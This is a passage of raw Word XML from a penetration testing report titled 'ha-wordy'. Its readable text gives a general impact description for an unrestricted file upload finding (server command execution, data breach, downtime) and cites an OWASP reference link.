            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00D909AF" w:rsidRPr="00D909AF">
              <w:rPr>
                <w:rFonts w:hAnsi="Symbol"/>
              </w:rPr>
              <w:t></w:t>
            </w:r>
            <w:r w:rsidR="00D909AF" w:rsidRPr="00D909AF">
              <w:t xml:space="preserve">  An</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00D909AF" w:rsidRPr="00D909AF">
              <w:t xml:space="preserve"> attacker can run commands on the server (install software, read confidential files, delete data).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11DAE90B" w14:textId="77777777" w:rsidR="00D909AF" w:rsidRPr="00D909AF" w:rsidRDefault="00D909AF" w:rsidP="00D909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909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09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They</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D909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use the server to attack other systems or to hide their activity.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02701154" w14:textId="0BBBCAC3" w:rsidR="00D43D23" w:rsidRPr="00D909AF" w:rsidRDefault="00D909AF" w:rsidP="00D909A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909A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09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Business</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D909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impact: service downtime, data breach, and reputational and legal consequences.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="54CCDDF6" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73A9D13C" w14:textId="2464E65F" w:rsidR="007E7173" w:rsidRDefault="00FD345C">
            <w:hyperlink r:id="rId26" w:history="1">
              <w:r w:rsidR="007E7173" w:rsidRPr="00121A09">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CB7D6EA" w14:textId="77777777" w:rsidR="00AA551C" w:rsidRDefault="00AA551C">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00AA551C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FAE94C" w14:textId="77777777" w:rsidR="00FD345C" w:rsidRDefault="00FD345C" w:rsidP="00D43D23">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="386A5728" w14:textId="77777777" w:rsidR="00FD345C" w:rsidRDefault="00FD345C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6E643429" w:rsidR="00D43D23" w:rsidRDefault="00FD345C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8874D9">
                <w:rPr>
                  <w:caps/>
                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>Penetration Testing Report – ha-wordy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2FB39972" w:rsidR="00D43D23" w:rsidRDefault="001F3962" w:rsidP="001F3962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B6841A" w14:textId="77777777" w:rsidR="00FD345C" w:rsidRDefault="00FD345C" w:rsidP="00D43D23">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F9385D4" w14:textId="77777777" w:rsidR="00FD345C" w:rsidRDefault="00FD345C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715B9B3A" w:rsidR="00D43D23" w:rsidRDefault="00D43D2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</w:t>
                              </w:r>
                              <w:r w:rsidR="008874D9">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                </w:rPr>
                                <w:t>ha-wordy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715B9B3A" w:rsidR="00D43D23" w:rsidRDefault="00D43D2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</w:t>
                        </w:r>
                        <w:r w:rsidR="008874D9">
                          <w:rPr>
                            <w:caps/>
                            <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          </w:rPr>
                          <w:t>ha-wordy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A3231"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7ED68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06418"/>
    <w:rsid w:val="00060DAE"/>
    <w:rsid w:val="00122982"/>
    <w:rsid w:val="00162C1E"/>
    <w:rsid w:val="00164F70"/>
    <w:rsid w:val="001B234A"/>
    <w:rsid w:val="001E304D"/>
    <w:rsid w:val="001F3962"/>
    <w:rsid w:val="00231B0A"/>
    <w:rsid w:val="00273C07"/>
    <w:rsid w:val="00286F60"/>
    <w:rsid w:val="002A11E5"/>
    <w:rsid w:val="00325279"/>
    <w:rsid w:val="003315C5"/>
    <w:rsid w:val="0037014D"/>
    <w:rsid w:val="003D1D02"/>
    <w:rsid w:val="003D5984"/>
    <w:rsid w:val="003F7DF3"/>
    <w:rsid w:val="00440943"/>
    <w:rsid w:val="00443051"/>
    <w:rsid w:val="004D7195"/>
    <w:rsid w:val="004E3F1D"/>
    <w:rsid w:val="00614E08"/>
    <w:rsid w:val="00643ABE"/>
    <w:rsid w:val="0066452D"/>
    <w:rsid w:val="006B5F8B"/>
    <w:rsid w:val="006E552A"/>
    <w:rsid w:val="006F33C3"/>
    <w:rsid w:val="006F7B4E"/>
    <w:rsid w:val="007068CA"/>
    <w:rsid w:val="007B792C"/>
    <w:rsid w:val="007E7173"/>
    <w:rsid w:val="008874D9"/>
    <w:rsid w:val="00935EC7"/>
    <w:rsid w:val="00A327B3"/>
    <w:rsid w:val="00AA14CD"/>
    <w:rsid w:val="00AA551C"/>
    <w:rsid w:val="00AE0686"/>
    <w:rsid w:val="00AF6F92"/>
    <w:rsid w:val="00B40DB4"/>
    <w:rsid w:val="00B52CB8"/>
    <w:rsid w:val="00B72058"/>
    <w:rsid w:val="00B73271"/>
    <w:rsid w:val="00BB6090"/>
    <w:rsid w:val="00BC0B6F"/>
    <w:rsid w:val="00BC4284"/>
    <w:rsid w:val="00D24F71"/>
    <w:rsid w:val="00D33049"/>
    <w:rsid w:val="00D43D23"/>
    <w:rsid w:val="00D909AF"/>
    <w:rsid w:val="00DC6439"/>
    <w:rsid w:val="00E94003"/>
    <w:rsid w:val="00ED30C4"/>
    <w:rsid w:val="00F152E9"/>
    <w:rsid w:val="00F168F1"/>
    <w:rsid w:val="00F37813"/>
    <w:rsid w:val="00F46F13"/>
    <w:rsid w:val="00F953C4"/>
    <w:rsid w:val="00FD345C"/>
    <w:rsid w:val="00FE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3F1D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007E71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wasp.org/www-community/vulnerabilities/Unrestricted_File_Upload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4D7195"/>
    <w:rsid w:val="007A39D1"/>
    <w:rsid w:val="00933D08"/>
    <w:rsid w:val="00951D66"/>
    <w:rsid w:val="00971147"/>
    <w:rsid w:val="00BC2C8E"/>
    <w:rsid w:val="00E31DDE"/>
    <w:rsid w:val="00ED01C3"/>
    <w:rsid w:val="00FE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47F5D-FF5C-4403-B7C3-6D7096E92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ha-wordy</dc:title>
  <dc:subject/>
  <dc:creator>Arfat</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-12T16:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-27T13:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>